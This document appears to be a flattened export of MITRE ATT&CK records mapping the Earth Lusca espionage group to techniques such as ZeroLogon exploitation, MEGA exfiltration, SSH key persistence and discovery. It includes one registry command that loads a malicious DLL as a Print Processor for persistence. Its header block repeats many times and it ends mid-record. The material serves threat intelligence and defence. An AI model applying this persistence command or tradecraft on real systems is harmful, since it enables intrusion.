type : intrusion-set
id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2022-07-01T20:12:30.184Z
modified : 2022-10-17T19:51:56.531Z
name : Earth Lusca
description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster; however, security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022)
aliases : ['Earth Lusca', 'TAG-22']
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 2.1.0
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack', 'mobile-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 1.0
technique_ref : attack-pattern--731f4f55-b6d0-41d1-a7a9-072a66389aea
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) adopted Cloudflare as a proxy for compromised servers.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--bee75401-9e24-4c5d-9203-0b3cdca01cbf
revoked : False
technique : Proxy
technique_description : Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap.(Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic. Adversaries can also take advantage of routing schemes in Content Delivery Networks (CDNs) to proxy command and control traffic.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
technique_id : T1090
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['Network Traffic: Network Traffic Flow', 'Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--dfd7cc1d-e1d8-4394-a198-97c4cab8aa67
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) used VBA scripts.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--245ced0a-5a53-44bd-a4db-07451f752b14
revoked : False
technique : Visual Basic
technique_description : Adversaries may abuse Visual Basic (VB) for execution. VB is a programming language created by Microsoft with interoperability with many Windows technologies such as [Component Object Model](https://attack.mitre.org/techniques/T1559/001) and the [Native API](https://attack.mitre.org/techniques/T1106) through the Windows API. Although tagged as legacy with no planned future evolutions, VB is integrated and supported in the .NET Framework and cross-platform .NET Core.(Citation: VB .NET Mar 2020)(Citation: VB Microsoft) Derivative languages based on VB have also been created, such as Visual Basic for Applications (VBA) and VBScript. VBA is an event-driven programming language built into Microsoft Office, as well as several third-party applications.(Citation: Microsoft VBA)(Citation: Wikipedia VBA) VBA enables documents to contain macros used to automate the execution of tasks and other functionality on the host. VBScript is a default scripting language on Windows hosts and can also be used in place of [JavaScript](https://attack.mitre.org/techniques/T1059/007) on HTML Application (HTA) webpages served to Internet Explorer (though most modern browsers do not come with VBScript support).(Citation: Microsoft VBScript) Adversaries may use VB payloads to execute malicious commands. Common malicious usage includes automating execution of behaviors with VBScript or embedding VBA content into [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001) payloads (which may also involve [Mark-of-the-Web Bypass](https://attack.mitre.org/techniques/T1553/005) to enable execution).(Citation: Default VBS macros Blocking)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.005
matrix : mitre-attack
platform : ['Windows', 'macOS', 'Linux']
data_sources : ['Module: Module Load', 'Command: Command Execution', 'Process: Process Creation', 'Script: Script Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) required users to click on a malicious file for the loader to activate.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--b71bc667-b3e8-4482-ba74-118049872be4
revoked : False
technique : Malicious File
technique_description : An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036) and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.(Citation: Password Protected Word Docs) While [Malicious File](https://attack.mitre.org/techniques/T1204/002) frequently occurs shortly after Initial Access, it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1204.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Process: Process Creation', 'File: File Creation']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--bf1b6176-597c-4600-bfcd-ac989670f96b
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used the megacmd tool to upload stolen files from a victim network to MEGA.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--a44ba3c3-406a-49cf-9d7b-9ee7f09f9ae4
revoked : False
technique : Exfiltration to Cloud Storage
technique_description : Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, editing, and retrieval of data from a remote cloud storage server over the Internet. Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='exfiltration')]
technique_id : T1567.002
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows']
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Connection Creation', 'Network Traffic: Network Traffic Flow', 'File: File Access', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--9db0cf3a-a3c9-4012-8268-123b9db6fd82
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Mimikatz](https://attack.mitre.org/software/S0002) to exploit a domain controller via the ZeroLogon exploit (CVE-2020-1472).(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--495db551-b69c-482e-b242-831011c054f7
revoked : False
technique : Exploitation of Remote Services
technique_description : Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system. An adversary may need to determine if the remote system is in a vulnerable state, which may be done through [Network Service Discovery](https://attack.mitre.org/techniques/T1046) or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources. There are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services.(Citation: NVD CVE-2014-7169) Depending on the permissions level of the vulnerable remote service, an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='lateral-movement')]
technique_id : T1210
matrix : mitre-attack
platform : ['Linux', 'Windows', 'macOS']
data_sources : ['Network Traffic: Network Traffic Content', 'Application Log: Application Log Content']
permissions_required : ['User']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--2de47683-f398-448f-b947-9abcc3e32fad
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has added the Registry key `HKLM\SYSTEM\ControlSet001\Control\Print\Environments\Windows x64\Print Processors\UDPrint” /v Driver /d “spool.dll /f` to load malware as a Print Processor.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6a779cbf-ef5c-4018-a91f-10889b2068b0
revoked : False
technique : Print Processors
technique_description : Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, `spoolsv.exe`, during boot.(Citation: Microsoft Intro Print Processors) Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternatively, a print processor can be registered to the print spooler service by adding the HKLM\SYSTEM\\[CurrentControlSet or ControlSet001]\Control\Print\Environments\\[Windows architecture: e.g., Windows x64]\Print Processors\\[user defined]\Driver Registry key that points to the DLL. For the malicious print processor to be correctly installed, the payload must be located in the dedicated system print-processor directory, which can be found with the GetPrintProcessorDirectory API call, or referenced via a relative path from this directory.(Citation: Microsoft AddPrintProcessor May 2018) After the print processors are installed, the print spooler service, which starts during boot, must be restarted in order for them to run.(Citation: ESET PipeMon May 2020) The print spooler service runs under SYSTEM level permissions; therefore, print processors installed by an adversary may run under elevated privileges.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1547.012
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'File: File Creation', 'Driver: Driver Load', 'Module: Module Load', 'Process: OS API Execution']
permissions_required : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
technique_ref : attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736
relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used PowerShell to execute commands.(Citation: TrendMicro EarthLusca 2022)
relationship_id : relationship--6e2b1acc-87b5-4947-a933-b376d48b126a
revoked : False
technique : PowerShell
technique_description : Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.001
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Script: Script Execution', 'Process: Process Creation', 'Process: Process Metadata', 'Command: Command Execution', 'Module: Module Load']
----------------------------------------------------------------------------------------------------
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--322bad5a-1c49-4d23-ab79-76d641794afa relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--aae6444e-c9e5-4965-9499-8aa6d546b58e revoked : False technique : System Service Discovery technique_description : Adversaries may try to gather information about registered local system services. Adversaries may obtain information about services using tools as well as OS utility commands such as sc query, tasklist /svc, systemctl --type=service, and net start. Adversaries may use the information from [System Service Discovery](https://attack.mitre.org/techniques/T1007) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. 
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1007 matrix : mitre-attack platform : ['Windows', 'macOS', 'Linux'] data_sources : ['Command: Command Execution', 'Process: Process Creation', 'Process: OS API Execution'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Tasklist](https://attack.mitre.org/software/S0057) to obtain information from a compromised host.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--6ef89fa5-cd74-499b-bbc0-3b0d83baeba1 revoked : False technique : Process Discovery technique_description : Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from [Process Discovery](https://attack.mitre.org/techniques/T1057) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions. In Windows environments, adversaries could obtain details on running processes using the [Tasklist](https://attack.mitre.org/software/S0057) utility via [cmd](https://attack.mitre.org/software/S0106) or Get-Process via [PowerShell](https://attack.mitre.org/techniques/T1059/001). Information about processes can also be extracted from the output of [Native API](https://attack.mitre.org/techniques/T1106) calls such as CreateToolhelp32Snapshot. In Mac and Linux, this is accomplished with the ps command. Adversaries may also opt to enumerate processes via /proc. 
On network devices, [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as `show processes` can be used to display current running processes.(Citation: US-CERT-TA18-106A)(Citation: show_processes_cisco_cmd) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1057 matrix : mitre-attack platform : ['Linux', 'macOS', 'Windows', 'Network'] data_sources : ['Process: Process Creation', 'Process: OS API Execution', 'Command: Command Execution'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--767dbf9e-df3f-45cb-8998-4903ab5f80c0 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has used [Nltest](https://attack.mitre.org/software/S0359) to obtain information about domain controllers.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--a38efb2d-3014-4196-b936-326a9a65ee83 revoked : False technique : Domain Trust Discovery technique_description : Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.(Citation: Microsoft Trusts) Domain trusts allow the users of the trusted domain to access resources in the trusting domain. 
The information discovered may help the adversary conduct [SID-History Injection](https://attack.mitre.org/techniques/T1134/005), [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003), and [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).(Citation: AdSecurity Forging Trust Tickets)(Citation: Harmj0y Domain Trusts) Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility [Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')] technique_id : T1482 matrix : mitre-attack platform : ['Windows'] data_sources : ['Process: Process Creation', 'Command: Command Execution', 'Script: Script Execution', 'Network Traffic: Network Traffic Content', 'Process: OS API Execution'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. [Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. 
Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
Retrieved September 2, 2022.', 'url': 'https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan'}] object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'] x_mitre_attack_spec_version : 2.1.0 x_mitre_deprecated : False x_mitre_domains : ['enterprise-attack', 'mobile-attack'] x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 x_mitre_version : 1.0 technique_ref : attack-pattern--6b57dc31-b814-4a03-8706-28bc20d739c4 relationship_description : [Earth Lusca](https://attack.mitre.org/groups/G1006) has dropped an SSH-authorized key in the `/root/.ssh` folder in order to access a compromised server with SSH.(Citation: TrendMicro EarthLusca 2022) relationship_id : relationship--1307fdab-a09c-4d48-a917-a76ba0113098 revoked : False technique : SSH Authorized Keys technique_description : Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.(Citation: SSH Authorized Keys) Users may edit the system’s SSH config file to modify the directives PubkeyAuthentication and RSAAuthentication to the value “yes” to ensure public key and RSA authentication are enabled. The SSH config file is usually located under /etc/ssh/sshd_config. Adversaries may modify SSH authorized_keys files directly with scripts or shell commands to add their own adversary-supplied public keys. In cloud environments, adversaries may be able to modify the SSH authorized_keys file of a particular virtual machine via the command line interface or rest API. 
For example, by using the Google Cloud CLI’s “add-metadata” command an adversary may add SSH keys to a user account.(Citation: Google Cloud Add Metadata)(Citation: Google Cloud Privilege Escalation) Similarly, in Azure, an adversary may update the authorized_keys file of a virtual machine via a PATCH request to the API.(Citation: Azure Update Virtual Machines) This ensures that an adversary possessing the corresponding private key may log in as an existing user via SSH.(Citation: Venafi SSH Key Abuse)(Citation: Cybereason Linux Exim Worm) It may also lead to privilege escalation where the virtual machine or instance has distinct permissions from the requesting user. Where authorized_keys files are modified via cloud APIs or command line interfaces, an adversary may achieve privilege escalation on the target virtual machine if they add a key to a higher-privileged user. SSH keys can also be added to accounts on network devices, such as with the `ip ssh pubkey-chain` [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) command.(Citation: cisco_ip_ssh_pubkey_ch_cmd) tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')] technique_id : T1098.004 matrix : mitre-attack platform : ['Linux', 'macOS', 'IaaS', 'Network'] data_sources : ['Command: Command Execution', 'Process: Process Creation', 'File: File Modification'] ---------------------------------------------------------------------------------------------------- type : intrusion-set id : intrusion-set--cc613a49-9bfa-4e22-98d1-15ffbb03f034 created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 created : 2022-07-01T20:12:30.184Z modified : 2022-10-17T19:51:56.531Z name : Earth Lusca description : [Earth Lusca](https://attack.mitre.org/groups/G1006) is a suspected China-based cyber espionage group that has been active since at least April 2019. 
[Earth Lusca](https://attack.mitre.org/groups/G1006) has targeted organizations in Australia, China, Hong Kong, Mongolia, Nepal, the Philippines, Taiwan, Thailand, Vietnam, the United Arab Emirates, Nigeria, Germany, France, and the United States. Targets included government institutions, news media outlets, gambling companies, educational institutions, COVID-19 research organizations, telecommunications companies, religious movements banned in China, and cryptocurrency trading platforms; security researchers assess some [Earth Lusca](https://attack.mitre.org/groups/G1006) operations may be financially motivated.(Citation: TrendMicro EarthLusca 2022) [Earth Lusca](https://attack.mitre.org/groups/G1006) has used malware commonly used by other Chinese threat groups, including [APT41](https://attack.mitre.org/groups/G0096) and the [Winnti Group](https://attack.mitre.org/groups/G0044) cluster, however security researchers assess [Earth Lusca](https://attack.mitre.org/groups/G1006)'s techniques and infrastructure are separate.(Citation: TrendMicro EarthLusca 2022) aliases : ['Earth Lusca', 'TAG-22'] external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G1006', 'external_id': 'G1006'}, {'source_name': 'TAG-22', 'description': '(Citation: Recorded Future TAG-22 July 2021)'}, {'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}, {'source_name': 'Recorded Future TAG-22 July 2021', 'description': 'INSIKT GROUP. (2021, July 8). Chinese State-Sponsored Activity Group TAG-22 Targets Nepal, the Philippines, and Taiwan Using Winnti and Other Tooling. 
